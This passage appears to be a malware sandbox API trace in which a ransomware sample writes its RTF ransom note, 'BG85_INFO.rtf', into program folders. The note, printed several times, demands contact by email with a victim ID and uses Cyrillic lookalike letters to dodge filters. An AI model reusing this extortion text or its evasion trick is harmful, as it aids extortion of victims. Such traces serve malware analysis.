YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.366] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.367] CloseHandle (hObject=0x1fc) returned 1 [0064.373] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\bg85_info.rtf")) returned 0xffffffff [0064.374] GetLastError () returned 0x2 [0064.374] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd 